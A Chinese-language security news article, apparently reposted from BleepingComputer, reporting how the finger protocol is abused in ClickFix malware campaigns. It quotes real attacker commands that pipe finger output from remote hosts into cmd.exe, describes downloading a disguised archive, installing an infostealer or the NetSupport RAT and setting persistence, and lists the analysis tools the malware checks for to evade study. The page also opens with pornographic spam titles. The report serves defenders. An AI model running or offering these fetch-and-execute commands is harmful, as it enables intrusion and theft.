国产av一二三区|日本不卡动作网站|黄色天天久久影片|99草成人免费在线视频|AV三级片成人电影在线|成年人aV不卡免费播放|日韩无码成人一级片视频|人人看人人玩开心色AV|人妻系列在线观看|亚洲av无码一区二区三区在线播放

網(wǎng)易首頁 > 網(wǎng)易號 > 正文 申請入駐

Finger協(xié)議遭濫用 淪為 ClickFix 惡意軟件攻擊工具

0
分享至


有著數(shù)十年歷史的finger協(xié)議正重新活躍,威脅者借助這一協(xié)議獲取遠程指令,在Windows設備上執(zhí)行惡意操作。

過去,人們通過Finger協(xié)議,在Unix與Linux系統(tǒng)中使用finger命令查詢本地及遠程用戶信息,該命令后續(xù)也被加入Windows系統(tǒng)。盡管目前仍受支持,但相較于數(shù)十年前的普及度,如今其使用率已大幅下降。

執(zhí)行finger命令后,會返回用戶的基礎信息,包括登錄名、用戶名(若在/etc/passwd中設置)、主目錄、電話號碼、最后活躍時間及其他詳情。


手指命令輸出

近期,多起惡意攻擊活動開始利用Finger協(xié)議,疑似通過“ClickFix攻擊”獲取指令并在設備上執(zhí)行。

這并非finger命令首次被如此濫用——早在2020年,研究人員就曾發(fā)出警告,指出該命令已被用作“ Living-off-the-Land Binary( LOLBIN,合法系統(tǒng)工具濫用)”,用于下載惡意軟件并規(guī)避檢測。


finger命令遭惡意濫用

上月,網(wǎng)絡安全研究員分享了一個批處理文件。該文件執(zhí)行后,會運行“finger root@finger.nateams[.]com”命令,從遠程finger服務器獲取指令,再通過管道符傳遞給cmd.exe在本地執(zhí)行。


手指命令輸出

目前該服務器已無法訪問,但MalwareHunterTeam又發(fā)現(xiàn)了更多利用finger命令的惡意軟件樣本與攻擊活動。例如,Reddit平臺上有用戶近期發(fā)文警示,稱自己遭遇了一場偽裝成驗證碼驗證的ClickFix攻擊——攻擊者誘導其運行一條Windows命令,以“證明自己是人類”。

盡管目前該服務器已不再響應finger請求,但另一位Reddit用戶捕獲了此前的輸出結(jié)果。這類攻擊將Finger協(xié)議用作遠程腳本傳輸工具:通過運行“finger vke@finger.cloudmega[.]org”命令,將輸出結(jié)果通過管道符傳遞給Windows命令處理器cmd.exe。

這一操作會觸發(fā)獲取到的指令執(zhí)行:創(chuàng)建隨機命名的路徑,將curl.exe復制為隨機文件名,通過重命名后的curl程序從cloudmega[.]org下載偽裝成PDF文件的壓縮包,并解壓出一個Python惡意軟件包。


偽裝成PDF的檔案內(nèi)容

隨后,系統(tǒng)會通過“pythonw.exe __init__.py”命令執(zhí)行該Python程序。最終執(zhí)行的指令會向攻擊者的服務器回傳“執(zhí)行成功”的確認信息,同時向用戶顯示偽造的“驗證你是人類”提示框。

目前尚不清楚該Python惡意軟件包的具體用途,但從一個關聯(lián)批處理文件可推斷,其應為一款信息竊取工具。

安全員還發(fā)現(xiàn)了另一項類似攻擊活動:通過“finger Kove2@api.metrics-strange.com | cmd”命令獲取并執(zhí)行指令,操作流程與上述ClickFix攻擊幾乎一致。


finger命令的輸出

分析發(fā)現(xiàn),這一攻擊手段更為成熟——指令會先檢測設備中是否存在惡意軟件研究常用工具,若發(fā)現(xiàn)則終止攻擊。這些工具包括filemon、regmon、procexp、procexp64、tcpview、tcpview64、Procmon、Procmon64、vmmap、vmmap64、portmon、processlasso、Wireshark、Fiddler Everywhere、Fiddler、ida、ida64、ImmunityDebugger、WinDump、x64dbg、x32dbg、OllyDbg及ProcessHacker。

若未檢測到惡意軟件分析工具,指令會下載偽裝成PDF的壓縮包并解壓。但與此前不同的是,該壓縮包中并非Python惡意軟件包,而是NetSupport Manager遠程訪問工具(RAT)安裝包。


NetSupport Manager RAT

隨后,指令會配置一個計劃任務,確保用戶登錄時自動啟動該遠程訪問惡意軟件。

目前來看,此類finger命令濫用活動似乎由單一威脅者發(fā)起,且主要通過ClickFix攻擊實施。但鑒于仍有用戶持續(xù)上當,相關攻擊活動需引起高度警惕。

對于防御方而言,阻止finger命令濫用的最佳方式是攔截流向TCP 79端口的出站流量——該端口是Finger協(xié)議用于連接守護進程的專用端口。

參考及來源:https://www.bleepingcomputer.com/news/security/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/

特別聲明:以上內(nèi)容(如有圖片或視頻亦包括在內(nèi))為自媒體平臺“網(wǎng)易號”用戶上傳并發(fā)布,本平臺僅提供信息存儲服務。

Notice: The content above (including the pictures and videos if any) is uploaded and posted by a user of NetEase Hao, which is a social media platform and only provides information storage services.

相關推薦
熱點推薦
新疆生產(chǎn)建設兵團:堅決擁護黨中央決定

新疆生產(chǎn)建設兵團:堅決擁護黨中央決定

新京報政事兒
2026-01-09 14:50:48
伊朗實施網(wǎng)絡管控

伊朗實施網(wǎng)絡管控

財聯(lián)社
2026-01-09 01:54:04
他是任期最長的江蘇省長,1967年被奪權,1980年又擔任江蘇省長

他是任期最長的江蘇省長,1967年被奪權,1980年又擔任江蘇省長

嘆為觀止易
2026-01-08 15:59:17
丹麥國防部:若美國武力奪取格陵蘭島 丹麥士兵可“先開槍再請示”

丹麥國防部:若美國武力奪取格陵蘭島 丹麥士兵可“先開槍再請示”

財聯(lián)社
2026-01-08 14:40:05
美軍公海扣押俄油輪,俄海軍竟一旁圍觀,這艘船到底是什么來歷?

美軍公海扣押俄油輪,俄海軍竟一旁圍觀,這艘船到底是什么來歷?

裝甲鏟史官
2026-01-08 14:48:57
可控核聚變領域,國內(nèi)表現(xiàn)優(yōu)秀的10家公司名單曝光!(建議收藏)

可控核聚變領域,國內(nèi)表現(xiàn)優(yōu)秀的10家公司名單曝光?。ńㄗh收藏)

元爸體育
2026-01-09 08:49:12
爆雷百億的浙金受害人,開始回款了

爆雷百億的浙金受害人,開始回款了

鳴金網(wǎng)
2026-01-08 18:54:10
記者:奇才愿與特雷-楊簽3年1.2億美元續(xù)約合同,奇才很歡迎他加盟

記者:奇才愿與特雷-楊簽3年1.2億美元續(xù)約合同,奇才很歡迎他加盟

懂球帝
2026-01-09 08:42:10
活塞傳奇:不理解現(xiàn)在的人對詹姆斯不屑一顧,反而在追捧喬丹

活塞傳奇:不理解現(xiàn)在的人對詹姆斯不屑一顧,反而在追捧喬丹

懂球帝
2026-01-09 07:45:44
一塊不該出現(xiàn)的石頭,上面記載的若是真的,將徹底改寫人類歷史

一塊不該出現(xiàn)的石頭,上面記載的若是真的,將徹底改寫人類歷史

豐譚筆錄
2026-01-09 07:50:09
醫(yī)生從瀕死患者動脈掏血栓如同掏碎肉,因為嚴重的肺動脈栓塞,導致血氧極低無法自主呼吸

醫(yī)生從瀕死患者動脈掏血栓如同掏碎肉,因為嚴重的肺動脈栓塞,導致血氧極低無法自主呼吸

觀威海
2026-01-06 10:46:23
后院徹底起火!丹麥不玩了:美國若敢動格陵蘭,北約就地解散!

后院徹底起火!丹麥不玩了:美國若敢動格陵蘭,北約就地解散!

防務觀察室
2026-01-06 14:42:25
向殺父嫌犯,索賠1000萬

向殺父嫌犯,索賠1000萬

中國新聞周刊
2026-01-09 12:17:57
別墅搜出23件國寶,全家集體失聯(lián)!徐湖平案落幕,17年舉報有結(jié)果

別墅搜出23件國寶,全家集體失聯(lián)!徐湖平案落幕,17年舉報有結(jié)果

詩意世界
2026-01-03 15:19:25
格陵蘭發(fā)達到什么水平?我去了才發(fā)現(xiàn),差距真的太大

格陵蘭發(fā)達到什么水平?我去了才發(fā)現(xiàn),差距真的太大

娛樂八卦木木子
2026-01-07 15:14:07
感謝邵佳一!李昊最后時刻3次世界級撲救:中國足球真不缺門將

感謝邵佳一!李昊最后時刻3次世界級撲救:中國足球真不缺門將

邱澤云
2026-01-09 01:07:50
最帥護旗手張自軒結(jié)婚不到一天,惡心一幕出現(xiàn),新娘被批沒有福相

最帥護旗手張自軒結(jié)婚不到一天,惡心一幕出現(xiàn),新娘被批沒有福相

鋭娛之樂
2026-01-09 08:45:21
官媒主動下場,53歲孟晚舟再掀天花板,讓任正非與整個商界沉默了

官媒主動下場,53歲孟晚舟再掀天花板,讓任正非與整個商界沉默了

牛牛叨史
2026-01-07 13:34:04
中央決定:曲光吉履新職

中央決定:曲光吉履新職

新京報
2026-01-09 12:22:20
又要動手了!特朗普,下一個目標定了!

又要動手了!特朗普,下一個目標定了!

新動察
2026-01-08 11:40:11
2026-01-09 16:55:00
嘶吼RoarTalk incentive-icons
嘶吼RoarTalk
不一樣的互聯(lián)網(wǎng)安全新視界
8119文章數(shù) 10545關注度
往期回顧 全部

科技要聞

市場偏愛MiniMax:開盤漲42%,市值超700億

頭條要聞

特朗普稱若大陸改變臺灣現(xiàn)狀他將"不悅" 外交部回應

頭條要聞

特朗普稱若大陸改變臺灣現(xiàn)狀他將"不悅" 外交部回應

體育要聞

金元時代最后的外援,來中國8年了

娛樂要聞

檀健次戀愛風波越演越烈 上學經(jīng)歷被扒

財經(jīng)要聞

郁亮的萬科35年:從"寶萬之爭"到"活下去"

汽車要聞

英偉達的野心:做一套自動駕駛的“安卓系統(tǒng)”

態(tài)度原創(chuàng)

健康
教育
親子
家居
手機

這些新療法,讓化療不再那么痛苦

教育要聞

常生龍:中小學日常考試管理新政的挑戰(zhàn),在于如何避免“穿新鞋走老路”

親子要聞

48歲媽媽懷孕7個月才發(fā)現(xiàn),孩子剛半歲肚子又大了?女兒緊急提問

家居要聞

木色留白 演繹現(xiàn)代自由

手機要聞

全球首款驍龍8E5雙潛望旗艦 OPPO Find X9 Ultra三月見

無障礙瀏覽 進入關懷版